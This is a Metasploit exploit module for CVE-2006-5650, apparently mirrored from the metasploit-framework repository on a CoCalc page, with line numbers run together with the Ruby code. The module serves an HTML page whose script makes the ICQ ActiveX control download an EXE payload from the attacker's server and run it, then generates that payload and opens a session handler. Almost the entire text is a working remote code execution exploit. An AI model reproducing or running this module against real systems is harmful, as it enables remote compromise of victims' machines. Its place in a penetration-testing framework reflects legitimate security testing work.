CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/browser/aol_icq_downloadagent.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011def initialize(info = {})12super(update_info(info,13'Name' => 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',14'Description' => %q{15This module allows remote attackers to download and execute arbitrary files16on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.17},18'License' => MSF_LICENSE,19'Author' => [ 'MC' ],20'References' =>21[22[ 'CVE', '2006-5650' ],23[ 'OSVDB', '30220' ],24[ 'BID', '20930' ],25[ 'ZDI', '06-037' ],26],27'Payload' =>28{29'Space' => 2048,30'StackAdjustment' => -3500,31},32'Platform' => 'win',33'Targets' =>34[35[ 'Automatic', { } ],36],37'DisclosureDate' => '2006-11-06',38'DefaultTarget' => 0))3940register_options(41[42OptString.new('URIPATH', [ true, "The URI to use.", "/" ])43])44end4546def autofilter47false48end4950def check_dependencies51use_zlib52end5354def on_request_uri(cli, request)5556payload_url = "http://"57payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']58payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"5960if (request.uri.match(/PAYLOAD/))61return if ((p = regenerate_payload(cli)) == nil)62data = generate_payload_exe({ :code => p.encoded })63print_status("Sending EXE payload")64send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })65return66end6768vname = rand_text_alpha(rand(100) + 1)69exe = rand_text_alpha_upper(rand(5) + 1)7071content = %Q|72<html>73<head>74<script>75try {76var #{vname} = new ActiveXObject('ICQPhone.SipxPhoneManager.1');77#{vname}.DownloadAgent("#{payload_url}/#{exe}.exe");78} catch( e ) { window.location = 'about:blank' ; }79</script>80</head>81</html>82|8384print_status("Sending exploit...")8586send_response_html(cli, content)8788handler(cli)8990end91end929394